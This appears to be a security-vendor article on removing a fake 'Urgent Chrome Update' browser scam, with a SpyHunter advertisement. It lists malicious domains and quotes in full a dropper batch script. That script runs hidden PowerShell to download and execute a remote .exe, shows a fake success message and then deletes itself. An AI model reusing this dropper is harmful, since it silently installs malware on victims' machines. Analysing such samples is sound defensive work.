Urgent Chrome Update "Virus" - How to Remove It
THREAT REMOVAL

Urgent Chrome Update “Virus” – How to Remove It

OFFER

SCAN YOUR PC
with SpyHunter

Scan Your System for Malicious Files
Note! Your computer might be affected by Urgent Chrome Update "Virus" and other threats.
Threats such as Urgent Chrome Update "Virus" may be persistent on your system. They tend to re-appear if not fully deleted. A malware removal tool like SpyHunter will help you to remove malicious programs, saving you the time and the struggle of tracking down numerous malicious files.
SpyHunter’s scanner is free but the paid version is needed to remove the malware threats. Read SpyHunter’s EULA and Privacy Policy

The article will aid you to remove the Urgent Chrome Update “virus” completely. Follow the malware removal instructions at the bottom of the article.

Urgent Chrome Update “virus” is a fake message that tries to scare you or rather trick you into launching whatever file is hosted on it. It usually comes in the form of a pop-up, but it may also open a whole page or a new tab by switching to that page. Amazon, Facebook, Yahoo and e-mail messages are reported to redirect you or even spawn this fake message. What happens is that it automatically downloads a file called chrome-update.bat and if you run it, your whole system could get encrypted. Other causes, such as installing less dangerous malware into your system, like an adware or a browser hijacker are also possible outcomes.

Threat Summary

NameUrgent Chrome Update "Virus"
TypeRedirect, Scam, PUP
Short DescriptionYou see a message saying Urgent Chrome Update, while the page auto-downloads a .bat file. Opening the file encrypts your computer system.
SymptomsYou are redirected to a page which has a message stating that you need an Urgent Chrome Update that is fake.
Distribution MethodFreeware Installations, Bundled Packages, Redirects from Sites
Detection Tool See If Your System Has Been Affected by Urgent Chrome Update "Virus"

Download

Malware Removal Tool

User ExperienceJoin Our Forum to Discuss Urgent Chrome Update "Virus".

Urgent Chrome Update “Virus” – Distribution

The spawning of the Urgent Chrome Update message could be distributed with various methods, the most reported of which is via e-mails and redirects from social networks. Reported networks that have been compromised or used for generating redirects with the Urgent Chrome Update messages are the following:

  • Facebook
  • Tumblr
  • Reddit
  • Pinterest
  • Yahoo and its services
  • Amazon and related sites

Other sites could have been compromised as well (or more likely their advertisements). These websites and social networks are not spreading the malicious file or redirect themselves, it’s just that the malware author chose them or found vulnerabilities to exploit to spread his program. Sometimes there is an .hta file, instead of the .bat one that contains a script with a download which encrypts your system or an adware version where you keep seeing the Urgent Chrome Update message along with lots of advertisements. Sometimes these files are programmed to show an installer setup before making changes to your computer to seem legitimate. Some of the setups could be inside a more aggressive adware installer coming with a bundle package.

Urgent Chrome Update is not excluded to be distributed with other methods, like add-ons or extensions added to your browser. When installed, they could start showing you advertisements, such as banners, pop-ups, pop-unders, whole page adverts and redirect you to various places online. Mainly the Google Chrome browser is affected, but the Urgent Chrome Update might show in other browsers.

Urgent Chrome Update “Virus” – Analysis

The Urgent Chrome Update message not to be treated lightly as it contains threats that can affect your computer machine in a bad way. Its malicious intent is undoubtedly present. The message is triggered from a redirect stemming either your e-mail service or a popular website which is either a social network or some kind of a site that sells goods. The most commonly exploited ones were mentioned in the Distribution section above. What happens next is that you see the Urgent Chrome Update message in either a pop-up, full-page notification or something similar. An example of one such redirect leading to a full-page message is shown below:

As you can see, the message is convincing as it uses the same logo as the Google Chrome browser, but also the same page design and button designs. What should throw you off is the domain that is shown in the URL address bar – it is unfamiliar and not known to be official, it is long and makes no sense. Examples of actual domain addresses which have spammed and spread Urgent Chrome Update messages are the following:

  • https://wegoobackonpointe.org
  • https://eeteeinsightsoft.org/1171650884382/
  • https://johjukrawall.net/8742906595196/7124820f2e8a80b357e0aa4ab96d705a
  • https://eishuscanmyessay.net/4882906595196/
  • https://aihahconsumerproductexposed.net/8712906595196/
  • https://yungionpage-tool.net/8161207311627/
  • https://yungionpage-tool.net/4561660827396/
  • https://kohphcctcct.net/3591668561808/
  • https://ws-00921qlk.r.worldssl.net/2401825818691/
  • https://elaetbucketexplorer.net/531841073279/
  • https\\:securebrowser.online
  • http://www.venturead.com/a/display.php?r=1113014
  • https://cubaedanto.net/9121124784762/
  • https://mahseeksperttv.com/7521817513667/
  • https://ibeelautotravel.com/7371071833663/ed5067ae87d7821e21bd0aec93e62c0b/
  • https://eliewgadgec.org/2952926573219/cb7b9f9616e585ea1a831bccdd7364b9/
  • https://aamaebuzzbookmarks.com/1151266950534/93f9b6c8b205a119425610de94d44d09/
  • https://vuxaibookmarkplayer.org/7191235857935/c2a6044c4797586dba118a4b1a5fc10e/
  • https://haephofcourse.org/6852925739117/0f19c4437a980572983c94a373660da8/
  • kxan.com
  • https://eaqueinfobar.com/8541824387942/
  • https://uabaetudoparawordpress.com/144850685323/
  • kiss-anime.me
  • https://akeeckickette.org/733679796354/
  • allrecipes.com
  • https://aesipspaghetticoder.org/7691828163121/
  • https://niaghmarykayintouch.org/1091828163121/
  • https://leejopr-canada.com/176848260300/
  • https://zahnopolicytiger.com/4211635439938/42c6aa8fc87ef7cddbaea42cb96f9664/
  • earthsky.org

All of the above URLs are just for referential purposes and not complete – do not visit or download anything from them. From all of the above URLs, the Urgent Chrome Update message will be displayed and once loaded it will automatically download a file. The file has the following variations:

  • chrome-update.bat
  • chrome-update.hta
  • chrome-update.vbs
  • chrome-update.zip

Some of these files could launch a setup, trying to copy the one of Google Chrome, but could also use a similar logo, which is not exactly the same. You can see an example of such a setup from the below picture:

Any of these files are stored inside the following location:

→%appdata%\Microsoft\Windows\Recent\CustomDestinations\

They also make changes to the following registry entries:

→HKEY_LOCAL_MACHINE\software\microsoft\Tracing\powershell_RASAPI32

→HKCU\Software\Microsoft\Windows\Current Version\Internet Settings\Connections

→HKEY_LOCAL_MACHINE\software\microsoft\Tracing\powershell_RASMANCS

This could mean that the innate Windows PowerShell Remote Access Server is accessed and could be used to download a setup for malware or a decryption program and execute it. Inside the .bat file you can see the following code:

@echo off
echo a=new ActiveXObject(‘Wscript.Shell’);a.run(“PowerShell -WindowStyle Hidden $d=$env:temp+’\\16330788701ac441736751e3ee3c6996.exe’;(New-Object System.Net.WebClient).DownloadFile(‘https://eeteeinsightsoft.org/17/524.dat’,$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName(‘System.Windows.Forms’);[system.windows.forms.messagebox]::show(‘Update complete.’,’Information’,[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)”,0,false); >”%temp%\install_flash.js”
start /min “” wscript.exe “%temp%\install_flash.js”
DEL “%~f0

It downloads a file via that script from a domain and tries to hide it, also installs a JavaScript object into Adobe Flash which could run more fake messages, advertisements or other malware. In case you see files downloaded on your computer that have not been downloaded by you and are not authorized, do not run them and just delete them. Then you should definitely run a full scan with an Anti-Virus and an Anti-Malware tool to be certain no leftovers have remained hidden on your personal computer.

In case a browser hijacker version is developed or you have installed a file related to the Urgent Chrome Update, and you notice your browser is changed, do not enter any information in its search bars. Be careful of what data you provide on such search pages, if that is your only browser available and you need to gather information about the situation. Don’t be clicking on suspicious advertisements or links that are displayed by the Urgent Chrome Update.

Urgent Chrome Update “Virus” – How to Remove It

To remove Urgent Chrome Update message and its files manually from your computer, follow the step-by-step removal instructions provided below. In case the manual removal does not get rid of the message, redirect and its files completely, you should search for and remove any leftovers with an advanced anti-malware tool. Such a program can keep your computer safe in the future.

Note! Your computer system may be affected by Urgent Chrome Update "Virus" or other threats.
Scan Your PC with SpyHunter
SpyHunter is a powerful malware removal tool designed to help users with in-depth system security analysis, detection and removal of threats such as Urgent Chrome Update "Virus".
Keep in mind, that SpyHunter’s scanner is only for malware detection. If SpyHunter detects malware on your PC, you will need to purchase SpyHunter’s malware removal tool to remove the malware threats. Read our SpyHunter 5 review. Click on the corresponding links to check SpyHunter’s EULA, Privacy Policy and Threat Assessment Criteria.

To remove Urgent Chrome Update "Virus" follow these steps:

1. Uninstall malicious programs from Windows
2. Clean your Browser and Registry from Urgent Chrome Update "Virus"

IMPORTANT!
Before starting the Automatic Removal below, please boot back into Normal mode, in case you are currently in Safe Mode.
This will enable you to install and use SpyHunter 5 successfully.

Use SpyHunter to scan for malware and unwanted programs

3. Scan for malware and unwanted programs with SpyHunter Anti-Malware Tool

Berta Bilbao

Berta is a dedicated malware researcher, dreaming for a more secure cyber space. Her fascination with IT security began a few years ago when a malware locked her out of her own computer.

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...